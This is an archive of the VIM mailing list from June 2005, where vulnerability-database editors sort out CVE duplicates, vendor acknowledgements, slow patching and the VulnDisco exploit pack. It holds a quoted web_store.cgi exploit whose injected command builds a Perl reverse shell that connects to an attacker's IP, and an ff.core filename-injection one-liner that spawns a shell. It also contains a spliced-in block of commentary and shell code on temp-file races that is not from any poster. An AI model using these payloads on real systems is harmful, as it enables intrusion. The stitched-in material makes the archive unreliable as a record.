> This is currently OSVDB 1105 and 11499 (one for each cve), both NEW
> status.

Since CVE-1999-0032 is far more authoritative than CVE-1999-0335, reference-wise anyway, I will deprecate CVE-1999-0335 in the next CVE version, and modify CVE-1999-0032 to have all the additional references and specifically discuss the -C option.

*phew* that was a whole lotta work... probably a well-placed email to one or two gurus from that time period would have been a lot faster!

- Steve

From jericho at attrition.org Wed Jun 8 03:18:38 2005
From: jericho at attrition.org (security curmudgeon)
Date: Wed Jun 8 03:18:41 2005
Subject: [VIM] Missed PHP file include in recent Calendarix
In-Reply-To: <200506070351.j573pZt2018835@linus.mitre.org>
References: <200506070351.j573pZt2018835@linus.mitre.org>
Message-ID:

: BUGTRAQ:20050531 multiple vulnerability Calendarix Advanced
: URL:http://archives.neohapsis.com/archives/bugtraq/2005-05/0356.html
:
: Multiple VDBs seem to have missed the following portion of the post:
:
: Include
:
: line 16
: admin/cal_admintop.php:include_once($calpath."cal_utils.php");

I didn't create an entry for this because it wasn't clear what 'include' entailed. Looking back, I probably should have created an unspecified type entry until more details were discovered. Given that some vulns are file inclusion, others are HTML inclusion, and one I created today was for arbitrary image inclusion.. just seeing "include" was not crystal clear. My first take was that this was code relevant to the other vulnerabilities.

: Thus it appears to be a typical file include issue where an include file
: depends on variables defined by previously included files, but is
: directly callable assuming the relevant PHP configuration etc. etc. etc.

Nice..

From jericho at attrition.org Wed Jun 8 03:51:42 2005
From: jericho at attrition.org (security curmudgeon)
Date: Wed Jun 8 03:51:43 2005
Subject: [VIM] update: VulnDisco
Message-ID:

Updating with new vulnerabilities. The 'sample pack' advertised has 3 vulnerabilities, and is free to current CANVAS customers.
---------- Forwarded message ----------
From: security curmudgeon
To: vim@attrition.org
Date: Sat, 14 May 2005 07:01:49 -0400 (EDT)
Reply-To: Vulnerability Information Managers
Subject: [VIM] discuss: VulnDisco

Evgeny Demidov of GLEG posted to DailyDave announcing the release of
their "VulnDisco" pack. This is a pack of exploits for the CANVAS
framework, released by Aitel & Immunity. According to the PDF, this pack
contained a wide variety of 0day exploits. Since then, he has followed up
with three updates that include a few more exploits each time.

Before anyone replies, consider this. I mailed Dave Aitel and asked if he
could verify that this pack of vulnerabilities were legit. Since they are
a CANVAS framework based set, I figured he of all people could
authenticate Evgeny's research. Dave replied and said he had not tested
any of it, and in fact, had not received a copy. While Immunity was a
reseller of the VulnDisco pack, they were not privileged to a copy of it.
I found that surprising.

There has been no followup on DailyDave regarding these packs, good nor
bad. Below you will find a summary of the posts and exploits claimed in
each pack.

That said, how does a vulnerability database handle such claims? Should
we be creating entries with the details we have? Or does this amount of
exploit code in one place suggest it may not be fully legit?

Thoughts from the madmen?

--

http://archives.neohapsis.com/archives/dailydave/2005-q1/0290.html
[Dailydave] ANNOUNCE - VulnDisco Pack for CANVAS release
http://www.gleg.net/download/VULNDISCO.pdf

To summarize:

Remotes in this version:

Windows

[0day] Ipswitch IMail buffer overflow
Vendor URL: http://www.ipswitch.com
Notes: remote exploit for certain IMail service.

[0day] MaxDB WebAgent stack overflow
Vendor URL: http://www.mysql.com
Notes: remote exploit for MaxDB WebTools wahttp service.

[0day] Pragma Fortress buffer overflow
Vendor URL: http://www.pragmasys.com
Notes: remote exploit for Pragma Fortress SSH server.
Unix

[0day] Exim 4.43 stack overflow
Vendor URL: http://www.exim.org
Notes: exploit for published AUTH SPA stack overflow.

[0day] ntpd buffer overflow
Vendor URL: http://www.ntp.org
Notes: remote root for certain configurations of ntpd

[0day] Samba buffer overflow
Vendor URL: http://www.samba.org
Notes: remote exploit for certain configurations of smbd

[0day] Sun ONE ASP buffer overflow
Vendor URL: http://www.sun.com

[0day] Sun ONE ASP arbitrary file retrieval exploit
Vendor URL: http://www.sun.com

Denial of service attacks

[0day] FreeBSD/NetBSD/OpenBSD kernel remote DoS
Vendor URL: http://www.freebsd.org, http://www.openbsd.org, http://www.openbsd.org
Notes: remote crash&reboot for certain configurations of *BSD kernel

[0day] fam remote DoS
Vendor URL: http://oss.sgi.com/projects/fam/
Notes: remote crash for certain configurations of fam

[0day] Ipswitch IMail remote DoS
Vendor URL: http://www.ipswitch.com

[0day] Kerio MailServer remote DoS
Vendor URL: http://www.kerio.com
Notes: remote crash in Kerio MailServer

[0day] MDaemon remote DoS
Vendor URL: http://www.altn.com

[0day] LSASS.EXE remote DoS
Vendor URL: http://www.microsoft.com

[0day] MySQL 4.x server remote DoS
Vendor URL: http://www.mysql.com

http://archives.neohapsis.com/archives/dailydave/2005-q1/0340.html
[Dailydave] VulnDisco Pack for CANVAS v1.1 is available

New remotes in this version:

[0day] Ethereal heap overflow (proof of concept)
[0day] Miranda IM buffer overflow
[0day] MDaemon buffer overflow

http://archives.neohapsis.com/archives/dailydave/2005-q2/0008.html
[Dailydave] VulnDisco Pack v1.2 for CANVAS is available

New remotes in this version:

[0day] PHP remote DoS
[0day] OpenSSL remote DoS
[0day] NSS heap overflow (proof of concept)**

http://archives.neohapsis.com/archives/dailydave/2005-q2/0087.html
[Dailydave] VulnDisco Pack v1.3 for CANVAS is available

New remote in this version:

[0day] SIMA - Samba remote root

http://archives.neohapsis.com/archives/dailydave/2005-q2/0295.html
[Dailydave]
VulnDisco Sample Pack 1.1

New remotes in this version:

[0day] Ethereal heap overflow
[0day] TCPDUMP DoS

From coley at mitre.org Thu Jun 9 02:10:18 2005
From: coley at mitre.org (Steven M. Christey)
Date: Thu Jun 9 02:20:41 2005
Subject: [VIM] Provable vendor ack for Goodtech SMTP issue
Message-ID: <200506090610.j596AI4r024857@linus.mitre.org>

Since I was in the general area, I emailed support@goodtechsys.com
regarding this vulnerability:

  BUGTRAQ:20050607 Denial of Service vulnerability in GoodTech SMTP Server for Windows NT/2000/XP version 5.14
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111817606013776&w=2

and they confirmed Reed Arvin's assertion that version 5.15 fixes the
issue.

- Steve

From jericho at attrition.org Fri Jun 10 04:33:01 2005
From: jericho at attrition.org (security curmudgeon)
Date: Fri Jun 10 04:33:03 2005
Subject: [VIM] 17136: Lpanel diagnose.php Arbitrary Domain DNS Setting Reset DoS (fwd)
Message-ID:

---------- Forwarded message ----------
From: Michael Cruz
To: moderators@osvdb.org
Date: Fri, 10 Jun 2005 01:25:16 -0400
Subject: [OSVDB Mods] [Change Request] 17136: Lpanel diagnose.php Arbitrary Domain DNS Setting Reset DoS

Lpanel team has released an update within an hour of this discovery as
noted by the change log:

Please note this user spammed our server forums and also threatened to
send future discoveries to private mailing lists which is in a way a
direct attack coming just hours before the hostingcon expo.

version 1.597 was released within an hour of the public posting on 3AM
6/6/05

A timely report has surfaced naming nearly 6 vulnerabilities found in
Lpanel. These issues were fixed within the hour of our forums being
spammed with the information. Please read here for more information:

http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034413.html

Please be sure to update to this version.
We will continue to perform security audits on Lpanel to discover any
other similar issues, if any are found we will address them in the next
couple days.

Confirmation is also noted by our users:

Any questions please contact mike@lpanel.net

Mike
Lpanel.net

From jericho at attrition.org Fri Jun 10 04:37:51 2005
From: jericho at attrition.org (security curmudgeon)
Date: Fri Jun 10 04:37:53 2005
Subject: [VIM] Lutelwall vendor ack/fix
Message-ID:

Freshmeat:

[038] - LutelWall 0.98 (Development)
  by Tomek Lutelmowski (http://freshmeat.net/users/TomekLutel/)
  Thu, Jun 9th 2005 06:40

Changes: Insecure temp file creation during update was fixed. Passive
FTP connections were corrected.

License: GNU General Public License (GPL)

URL: http://freshmeat.net/projects/lutelwall/

From coley at linus.mitre.org Fri Jun 10 14:07:17 2005
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri Jun 10 14:17:26 2005
Subject: [VIM] 17136: Lpanel diagnose.php Arbitrary Domain DNS Setting Reset DoS (fwd)
In-Reply-To:
References:
Message-ID:

It took a couple minutes, but a link to the online changelog is at:

http://www.lpanel.net/changelog.php

Thanks, Brian!

- Steve

From coley at linus.mitre.org Fri Jun 10 14:23:18 2005
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri Jun 10 14:33:26 2005
Subject: [VIM] Lutelwall vendor ack/fix
In-Reply-To:
References:
Message-ID:

On Fri, 10 Jun 2005, security curmudgeon wrote:

> Changes: Insecure temp file creation during update was fixed. Passive FTP
> connections were corrected.

As strong as the evidence is here - time of release relative to initial
disclosure, type of vuln fixed - I've learned that sometimes the vendor
is STILL fixing some other issue. I tried to get version 0.97 to compare
with 0.98, but it's no longer available.
However, comparing the current "lutelwall" script with the copy shown in
the original Full-Disclosure post, the author changed the code from this:

  echo -n "  Changes since previous version:"
  echo `wget -C off -O $tmp-newfeat -q -t 1 -T 3 -w 3 http://firewall.lutel.pl/FEATURES-${new_ver}`
  cat $tmp-newfeat

to this:

  echo -n "  Changes since previous version:"
  rm -rf $tmp-newfeat
  if [ ! -e $tmp-newfeat ]; then
    echo `wget -C off -O $tmp-newfeat -q -t 1 -T 3 -w 3 http://firewall.lutel.pl/FEATURES-${new_ver}`
    cat $tmp-newfeat

Well, at least the exploit window is much narrower now...

- Steve

From jericho at attrition.org Tue Jun 14 19:05:01 2005
From: jericho at attrition.org (security curmudgeon)
Date: Tue Jun 14 19:05:04 2005
Subject: [VIM] new record on delayed patching..
Message-ID:

Winner is RedHat?

http://rhn.redhat.com/errata/RHSA-2005-489.html
Issued on: 2005-06-13

[..]

A bug was found in the way Squid handles access to the cachemgr.cgi
script. It is possible for an authorised remote user to bypass access
control lists with this flaw. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CVE-1999-0710 to this
issue.

[..]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0710

http://archives.neohapsis.com/archives/bugtraq/1999-q3/0194.html
daniel@NEWS.GUS.NET
Fri, 23 Jul 1999 16:36:32 -0700

--

So Jul 23, 1999 vuln gets patched Jun 13, 2005?

From coley at linus.mitre.org Tue Jun 14 19:10:54 2005
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue Jun 14 19:11:05 2005
Subject: [VIM] new record on delayed patching..
In-Reply-To:
References:
Message-ID:

On Tue, 14 Jun 2005, security curmudgeon wrote:

> Winner is RedHat?
>
> http://rhn.redhat.com/errata/RHSA-2005-489.html
> Issued on: 2005-06-13
>
> A bug was found in the way Squid handles access to the cachemgr.cgi script. It
> is possible for an authorised remote user to bypass access control lists with
> this flaw.
> The Common Vulnerabilities and Exposures project (cve.mitre.org) has
> assigned the name CVE-1999-0710 to this issue.

Hmmmm... but CVE-1999-0710 lists REDHAT:RHSA-1999:025 as an advisory, so
it had been fixed at *some* point in the past. That means that this is
either (1) a regression or (2) an improper application of an old CVE to a
similar issue or variant, which sometimes happens.

Either way, time for an email :)

- Steve

From jericho at attrition.org Tue Jun 14 19:11:45 2005
From: jericho at attrition.org (security curmudgeon)
Date: Tue Jun 14 19:11:47 2005
Subject: [VIM] new record on delayed patching..
Message-ID:

(sorry if this comes through twice, testing something)

Winner is RedHat?

http://rhn.redhat.com/errata/RHSA-2005-489.html
Issued on: 2005-06-13

[..]

A bug was found in the way Squid handles access to the cachemgr.cgi
script. It is possible for an authorised remote user to bypass access
control lists with this flaw. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CVE-1999-0710 to this
issue.

[..]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0710

http://archives.neohapsis.com/archives/bugtraq/1999-q3/0194.html
daniel@NEWS.GUS.NET
Fri, 23 Jul 1999 16:36:32 -0700

--

So Jul 23, 1999 vuln gets patched Jun 13, 2005?

From jericho at attrition.org Tue Jun 14 19:13:01 2005
From: jericho at attrition.org (security curmudgeon)
Date: Tue Jun 14 19:13:02 2005
Subject: [VIM] Re: old Solaris ff.core help =) (fwd)
Message-ID:

---------- Forwarded message ----------
From: Casper.Dik@Sun.COM
To: security curmudgeon
Cc: Steven Christey
Date: Wed, 08 Jun 2005 09:48:12 +0200
Subject: Re: old Solaris ff.core help =)

>this post:
>
>http://archives.neohapsis.com/archives/bugtraq/1995_1/0003.html
>
>This is one of a few mentions of "two vulnerabilities in ff.core".
>Based
>on the date, the Aug 30, 1994 IFS would be one of the two, but I can't
>find record of the second beyond the somewhat cryptic 101889 patch notes
>and several mail list posts.
>
>In short, can you confirm there were two vulnerabilities around 1994/1995
>in ff.core? If so, any hint as to what the second was, or the impact?
>Given the age of the program, I don't think it is letting any serious
>cat out of the bag =) This is purely for a historic perspective on
>vulnerabilities.

ff.core was a mess and there were certainly several vulnerabilities in
it; I corresponded a lot about this with Sun and then made sure it was
mostly fixed after I joined Sun.

It used popen/system a lot and allowed you to chown random files.

My old favourite exploit (which I had memorized and could type by hand)
after the initial (botched) fix was:

	mkdir -p '/tmp/rdiskette0/`/bin/sh/dev/tty 2>&1`'
	ff.core 0 1 '/tmp/rdiskette0/`/bin/sh/dev/tty 2>&1`' x

There were some symlink issues and there was the ability to rename random
files.

Casper

From jericho at attrition.org Tue Jun 14 20:26:41 2005
From: jericho at attrition.org (security curmudgeon)
Date: Tue Jun 14 20:27:18 2005
Subject: [VIM] #2005-0028 typo
Message-ID:

From the advisory:

wget:

- Security Fix: wget allows a remote malicious web server to overwrite
  certain files via a redirection URL containing a ".." that resolves to
  the IP address of the malicious server, which bypasses wget's filtering
  for ".." sequences.

- wget does not filter or quote control characters when displaying HTTP
  responses to the terminal, which may allow remote malicious web servers
  to inject terminal escape sequences and execute arbitrary code.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2004-1487 and CAN-2004-1487 to these issues.

This lists the same two CAN designations.
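An added example, not from the LutelWall script and not from any VIM poster, illustrating the temp-file point Steve raises about LutelWall 0.98 a few messages up: a predictable name under a shared directory such as $tmp-newfeat can be created by another local user (as a plain file or a symlink) before the script writes to it, and an rm-then-test-then-write sequence only shrinks that window, because the test and the later open are still separate operations. The POSIX shell below, whose function names and "lutelwall.XXXXXX" template are choices made for this example, contrasts the predictable path with a file created atomically by mktemp(1), and checks the created file for the properties a defender wants before using it.

```shell
#!/bin/sh
# Added example, not code from LutelWall or from any VIM poster.
# Function names and the "lutelwall.XXXXXX" template are assumptions
# made for this example.

# The pattern Steve quotes: a predictable name under a shared directory.
# Anyone who can guess the name can create it (or a symlink to one of
# this user's files) before wget opens it for writing. The later
# "rm -rf ... if [ ! -e ... ]" variant only shortens the race; the test
# and wget's open() are still two separate system calls.
unsafe_tmp_path() {
    # $1 is the base the script would use, e.g. /tmp/lutelwall
    printf '%s-newfeat\n' "$1"
}

# Safe pattern: let mktemp(1) create the file itself. It opens with
# O_CREAT|O_EXCL, so an existing file or symlink at that name makes it
# fail instead of being followed, and the file is created mode 0600.
safe_tmp_file() {
    dir="${TMPDIR:-/tmp}"
    mktemp "$dir/lutelwall.XXXXXX"
}

# Check that a path has the properties expected of a private temp file:
# a regular file, not a symlink, owned by the calling uid, and
# readable/writable by the owner only. Returns 0 if all hold, else 1.
check_tmp_file() {
    f="$1"
    [ -f "$f" ] || return 1
    [ ! -L "$f" ] || return 1
    [ "$(ls -ldn "$f" | awk '{print $3}')" = "$(id -u)" ] || return 1
    [ "$(ls -ldn "$f" | cut -c1-10)" = "-rw-------" ] || return 1
    return 0
}

# How the download step would look with a mktemp-created file: the file
# is created and verified before wget runs, and removed whatever happens.
fetch_features() {
    url="$1"
    f=$(safe_tmp_file) || return 1
    check_tmp_file "$f" || { rm -f "$f"; return 1; }
    if wget -O "$f" -q -t 1 -T 3 -w 3 "$url"; then
        cat "$f"
        rc=0
    else
        rc=1
    fi
    rm -f "$f"
    return "$rc"
}
```

check_tmp_file is what you would run in a test harness or a pre-commit review of shell scripts that write under /tmp: it rejects a symlink planted at the expected name and a file that another user can read, which are the two outcomes the predictable $tmp-newfeat pattern allows. fetch_features shows the download step with the file created first and cleaned up on every path; it needs network access, so the offline checks exercise only the creation and verification functions.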
From jericho at attrition.org Wed Jun 15 06:40:22 2005
From: jericho at attrition.org (security curmudgeon)
Date: Wed Jun 15 06:40:24 2005
Subject: [VIM] new record on delayed patching..
In-Reply-To:
References:
Message-ID:

: Winner is RedHat?
:
: http://rhn.redhat.com/errata/RHSA-2005-489.html
: Issued on: 2005-06-13

http://rhn.redhat.com/errata/RHSA-2005-415.html

Also covers five CVE including 1999-0710.

From coley at mitre.org Thu Jun 16 18:12:40 2005
From: coley at mitre.org (Steven M. Christey)
Date: Thu Jun 16 18:13:01 2005
Subject: [VIM] LaTeX2rtf vendor acknowledgement (Sep 2004)
Message-ID: <200506162212.j5GMCeWr013105@linus.mitre.org>

The expandmacro() buffer overflow in LaTeX2rtf 1.9.15 was addressed by
the vendor.

http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log

The "Sat Oct 2 18:31:00 2004" entry says "avoid buffer overruns in macro
expansion that can be security holes reported by D. J. Bernstein".

(CVE candidate pending. Cross-refs: BID:11233, SECTRACK:1011367,
OSVDB:10216, XF:latex2rtf-expandmacro-bo(17460))

- Steve

From coley at mitre.org Wed Jun 22 19:06:09 2005
From: coley at mitre.org (Steven M. Christey)
Date: Wed Jun 22 19:06:54 2005
Subject: [VIM] Vendor ack inquiry for DUware issues
Message-ID: <200506222306.j5MN699E026364@linus.mitre.org>

I just sent an inquiry to http://www.duware.com/home/contact.asp to ask
DUware about the various issues that have been released in recent months,
including:

http://echo.or.id/adv/adv19-theday-2005.txt
http://www.digitalparadox.org/advisories/dup.txt
http://www.digitalparadox.org/advisories/duppro.txt

Note that there is partial overlap between the ECHO_ADV_19$2005 advisory
and the digital paradox posts, although I haven't fully diagnosed it yet.
- Steve

From jericho at attrition.org Fri Jun 24 05:00:54 2005
From: jericho at attrition.org (security curmudgeon)
Date: Fri Jun 24 05:00:56 2005
Subject: [VIM] Vendor ack inquiry for DUware issues
In-Reply-To: <200506222306.j5MN699E026364@linus.mitre.org>
References: <200506222306.j5MN699E026364@linus.mitre.org>
Message-ID:

: I just sent an inquiry to http://www.duware.com/home/contact.asp to
: ask DUware about the various issues that have been released in recent
: months, including:
:
: http://echo.or.id/adv/adv19-theday-2005.txt
: http://www.digitalparadox.org/advisories/dup.txt
: http://www.digitalparadox.org/advisories/duppro.txt
:
: Note that there is partial overlap between the ECHO_ADV_19$2005 advisory
: and the digital paradox posts, although I haven't fully diagnosed it
: yet.

I'm just getting to these for OSVDB and my first glance through suggests
there is overlap. Hopefully I will get to them tonight or this weekend
and have a concise list of vulns.

Why can't vendors just fix stuff faster! =)

From jericho at attrition.org Fri Jun 24 18:37:57 2005
From: jericho at attrition.org (security curmudgeon)
Date: Fri Jun 24 18:37:58 2005
Subject: [VIM] Reverse Engineering Microsoft Patches in 20 Minutes
Message-ID:

http://www.osvdb.org/blog/

Reverse Engineering Microsoft Patches in 20 Minutes
Posted in General Vulnerability Info on June 24th, 2005 by jericho

Halvar posted to the DailyDave mail list today showing a brief flash
based demonstration of some of his reverse engineering tools. The
presentation shows how one can reverse engineer a Microsoft patch using
binary diff analysis, and figure out exactly what the vulnerability is,
down to the function.

What will this technology and method do, when hundreds (thousands?) of
people can reverse engineer a patch that fast, and offer full
vulnerability details within minutes of a patch? That type of
information would be incredibly valuable to some people, probably for
more nefarious purposes.
That type of information would be incredible for the security community
and vulnerability databases who often have a difficult time separating
issues due to lack of details. Even more interesting, would this show a
more concise history of vulnerabilities in a given vendor's product that
demonstrates the same programs, routines and even functions are found
vulnerable repeatedly? Would this help companies identify who should be
singled out for additional secure coding workshops?

post: http://archives.neohapsis.com/archives/dailydave/2005-q2/0377.html
demo: http://www.sabre-security.com/products/flash_bindiff_png.html

From jericho at attrition.org Sat Jun 25 07:20:29 2005
From: jericho at attrition.org (security curmudgeon)
Date: Sat Jun 25 07:20:32 2005
Subject: [VIM] Slowaris?
Message-ID:

Hah, the old joke about Sun patching!

http://sunsolve.sun.com/search/document.do?assetkey=1-26-101426-1

1. The "Safe.pm" Perl module contains a security vulnerability which may
   allow a local or remote unprivileged user to bypass compartment
   access controls if a Perl application utilizes the "Safe.pm" Perl
   module.

2. The "CGI.pm" Perl module contains a cross site scripting security
   vulnerability.

These issues are described here:

CIAC Bulletin n-155 - http://www.ciac.org/ciac/bulletins/n-155.shtml
CAN-2003-0615 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0615
CAN-2002-1223 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1323

From jericho at attrition.org Sun Jun 26 06:32:49 2005
From: jericho at attrition.org (security curmudgeon)
Date: Sun Jun 26 06:32:51 2005
Subject: [VIM] Security Vulnerability Severity Classification
Message-ID:

http://www.suse.de/~thomas/papers/Severity-Metric.pdf

Security Vulnerability Severity Classification
by Thomas Biege (thomas[at]suse.de)
27th January 2005

Abstract

This paper will describe a method of classifying the severity of
security bugs in software for Unix-like systems.
On the following pages I will propose a metric with weights to describe
the impact of vulnerabilities on a scale S with n elements to provide an
objective rating system. This classification scheme should serve as
reference for the SuSE Security Team for releasing security
announcements. Hopefully this mechanism will be adopted by other vendors
to have a vendor independent rating system. Such a vendor independent
rating scheme will help customers, other vendors, and security
companies/organisations to judge more precisely about the level of impact
of a released security update.

From jericho at attrition.org Mon Jun 27 05:09:27 2005
From: jericho at attrition.org (security curmudgeon)
Date: Mon Jun 27 05:09:30 2005
Subject: [VIM] Returned post for bugtraq@securityfocus.com (web_store.cgi)
Message-ID:

---------- Forwarded message ----------
From: bugtraq-help@securityfocus.com
To: jericho@attrition.org
Date: 27 Jun 2005 01:12:05 -0000
Subject: Returned post for bugtraq@securityfocus.com

Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.

I'm working for my owner, who can be reached
at bugtraq-owner@securityfocus.com.

I'm sorry, the list moderators for the bugtraq list
have failed to act on your post. Thus, I'm returning it to you.
If you feel that this is in error, please
repost the message or contact a list moderator directly.

--- Enclosed, please find the message you sent.
From: security curmudgeon
To: bugtraq@securityfocus.com
Date: Wed, 22 Jun 2005 04:47:00 -0400 (EDT)
Subject: Re: Remote Exploit for Web_store.cgi

On Mon, 13 Jun 2005 ActionSpider@securityfocus.com wrote:

: #!/usr/bin/perl -w
: #
: #********************************************************************************************
: # Remote Command Execution Vulnerability In Web_store.cgi                                  *

: $string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";

This was disclosed on 2004-07-17 by Zero_X www.lobnan.de Team
(zero-x@linuxmail.org).

http://archives.neohapsis.com/archives/bugtraq/2004-07/0197.html

From jericho at attrition.org Mon Jun 27 20:49:25 2005
From: jericho at attrition.org (security curmudgeon)
Date: Mon Jun 27 20:49:27 2005
Subject: [VIM] CVE Dupe? (2005-0756 & 2005-1762)
Message-ID:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0756

ptrace 2.6.8.1 does not properly verify addresses on the amd64 platform,
which allows local users to cause a denial of service (kernel crash)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1762

(reserved)

but:

http://www.ubuntulinux.org/support/documentation/usn/usn-143-1

A Denial of Service vulnerability has been discovered in the ptrace()
call on the amd64 platform. By calling ptrace() with specially crafted
("non-canonical") addresses, a local attacker could cause the kernel to
crash. This only affects the amd64 platform. (CAN-2005-1762)

At first glance, 0756 seems to cover 'ptrace' the utility.
If that is the case, almost everyone is referencing it incorrectly as
"Linux Kernel ptrace() function". If it is indeed referring to the ptrace
function, then these two issues seem very close. Both linux kernel, both
on amd64 specifically, both DoS, both with ptrace() function, both via
"address validation" issues.

From coley at mitre.org Wed Jun 29 13:57:36 2005
From: coley at mitre.org (Steven M. Christey)
Date: Wed Jun 29 14:00:40 2005
Subject: [VIM] Differences between ASPNuke (ASP Nuke? ASP-Nuke?) and aspnuke?
Message-ID: <200506291757.j5THvacJ014111@linus.mitre.org>

Notice:

  BUGTRAQ:20050627 aspnuke is vulnerable to sql injection
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111989828622112&w=2

The poster says "remember aspnuke is [quite different] from asp-nuke." I
can't figure out *how* or *why*, though.

www.aspnuke.com, referenced in the Bugtraq post, isn't working. But some
other posts for "ASP Nuke" earlier that week, such as this:

  BUGTRAQ:20050626 M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111989223906484&w=2

Also use "www.aspnuke.com" as the vendor. But a completely different
spelling.

Then there's "asp-nuke.com," which appears to be the "asp-nuke" that is
referred to in the first post.

Anybody know what's going on? Are there 2 "ASP Nuke" products or three?
Which bug report goes with which product?

- Steve

From jericho at attrition.org Thu Jun 30 06:16:21 2005
From: jericho at attrition.org (security curmudgeon)
Date: Thu Jun 30 06:16:23 2005
Subject: [VIM] Plans security question (fwd)
Message-ID:

---------- Forwarded message ----------
From: security curmudgeon
To: daltonlp@gmail.com
Date: Thu, 30 Jun 2005 06:15:31 -0400 (EDT)
Subject: Plans security question

Hi,

I saw the news entry dated Apr 30, 2005 for the SQL bug that could
disclose the mySQL password. Updating to 6.7.1 fixes this.
I also saw Secunia released information regarding an SQL injection
attack in plans.cgi (http://secunia.com/advisories/15854/) on Jun 29,
2005. Their note says upgrading to 6.7.2 fixes this bug.

I did not see mention of the plans.cgi SQL injection on your news site
and was wondering if these really refer to the same vulnerability, or if
this is two separate issues?

Thanks for any clarification!

Brian

From coley at linus.mitre.org Thu Jun 30 14:54:24 2005
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu Jun 30 14:55:47 2005
Subject: [VIM] Security Vulnerability reported in ActiveBuyAndSell 6.2 (fwd)
Message-ID:

No response yet... This is CAN-2005-2063.

- Steve

---------- Forwarded message ----------
Date: Tue, 28 Jun 2005 21:33:32 -0400 (EDT)
From: Steven M. Christey
To: Support@activewebsoftwares.com
Cc: jschommer@mitre.org, coley@mitre.org
Subject: Security Vulnerability reported in ActiveBuyAndSell 6.2

Hello,

I am a computer security professional and the editor for the Common
Vulnerabilities and Exposures (CVE) project. CVE is a list of software
vulnerabilities, and it is widely used in the computer security
industry.

Recently, a vulnerability in ActiveBuyAndSell was publicly reported to a
well-known security mailing list:

  BUGTRAQ:20050624 [ECHO_ADV_21$2005] MUltiple Vulnarable In ActiveBuyAndSell
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111963341429906&w=2

Is this vulnerability report accurate? If so, then is the problem fixed,
and in which versions?

Thank you,

Steve Christey
Principal Information Security Engineer
CVE Editor
The MITRE Corporation

From coley at linus.mitre.org Thu Jun 30 14:59:49 2005
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu Jun 30 15:01:11 2005
Subject: [VIM] CVE Dupe? (2005-0756 & 2005-1762)
In-Reply-To:
References:
Message-ID:

On Mon, 27 Jun 2005, security curmudgeon wrote:

> http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0756
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1762
> (reserved)
>
> but:
>
> http://www.ubuntulinux.org/support/documentation/usn/usn-143-1

Hmmmm. Both CANs were assigned by Red Hat, so the likelihood of a dupe
may be low. I'll check it out.

- Steve

From jericho at attrition.org Thu Jun 30 17:18:04 2005
From: jericho at attrition.org (security curmudgeon)
Date: Thu Jun 30 17:18:06 2005
Subject: [VIM] Re: Plans security question (fwd)
Message-ID:

---------- Forwarded message ----------
From: Lloyd Dalton
To: security curmudgeon
Date: Thu, 30 Jun 2005 11:21:16 -0500
Subject: Re: Plans security question

Brian,

Thanks for the note. I actually wasn't aware of the note on Secunia. I
suspect it was NoseyNick who posted it (he discovered the holes).

The sql injection / xss vulnerability you mention was actually fixed in
6.7.1 (not in 6.7.2). The version on Secunia is incorrect. It is a
separate issue from the password exposure issue.

It also wasn't described very well on the main page (it should say
"Fixes for several potential sql injection and cross-site scripting
vulnerabilities")

Hope this helps,

- Lloyd Dalton

On 6/30/05, security curmudgeon wrote:
>
> Hi,
>
> I saw the news entry dated Apr 30, 2005 for the SQL bug that could
> disclose the mySQL password. Updating to 6.7.1 fixes this.
>
> I also saw Secunia released information regarding an SQL injection attack
> in plans.cgi (http://secunia.com/advisories/15854/) on Jun 29, 2005. Their
> note says upgrading to 6.7.2 fixes this bug.
>
> I did not see mention of the plans.cgi SQL injection on your news site and
> was wondering if these really refer to the same vulnerability, or if this
> is two separate issues?
>
> Thanks for any clarification!
>
> Brian
>
>